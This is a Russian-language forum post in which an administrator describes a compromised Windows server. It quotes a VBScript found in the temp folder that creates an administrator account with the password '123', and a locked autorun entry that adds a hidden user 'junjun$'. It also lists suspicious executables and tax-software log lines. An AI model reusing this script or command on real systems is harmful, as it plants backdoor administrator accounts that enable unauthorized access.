На сервере нашел файл в c:\windows\temp pgnn.vbs, который делает вот такую вот вещь set wsnetwork=CreateObject("WSCRIPT.NETWORK") os="WinNT://"&wsnetwork.ComputerName Set ob=GetObject(os) Set oe=GetObject(os&"/Administrators,group") Set od=ob.Create("user","123") od.SetPassword "123" od.SetInfo Set of=GetObject(os&"/123",user) oe.add os&"/123" в автозагрузке msconfig стоит и нельзя изменить следующее net user junjun$ test$ /add (если убрать галочку то при перезагрузке галочка все равно стоит) в regedit \HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run стоит shell со значением net user junjun$ test$ /add изменить или удалить нельзя (ошибка при записи нового значения) еще в корне диска "С:\" лежат файлы shwumima.exe xpwumima.exe zywumima.exe антивирусы на них не ругаются во вновь созданых учетных записях C:\Documents and Setings\byzj$\Мои документы\LOG и т.д. находятся log файлы,в которых можно увидеть такое ezvit.exe Warning: 0 : В_дправка файла: 05951919815340F0500103100000000120920110595.XML DateTime=2011-11-01T09:23:58.7031250Z ezvit.exe Warning: 0 : Пошта: zvit@sta.gov.ua DateTime=2011-11-01T09:23:58.7031250Z ezvit.exe Warning: 0 : По електронн_й пошт_: zvit@sta.gov.ua DateTime=2011-11-01T09:23:58.7187500Z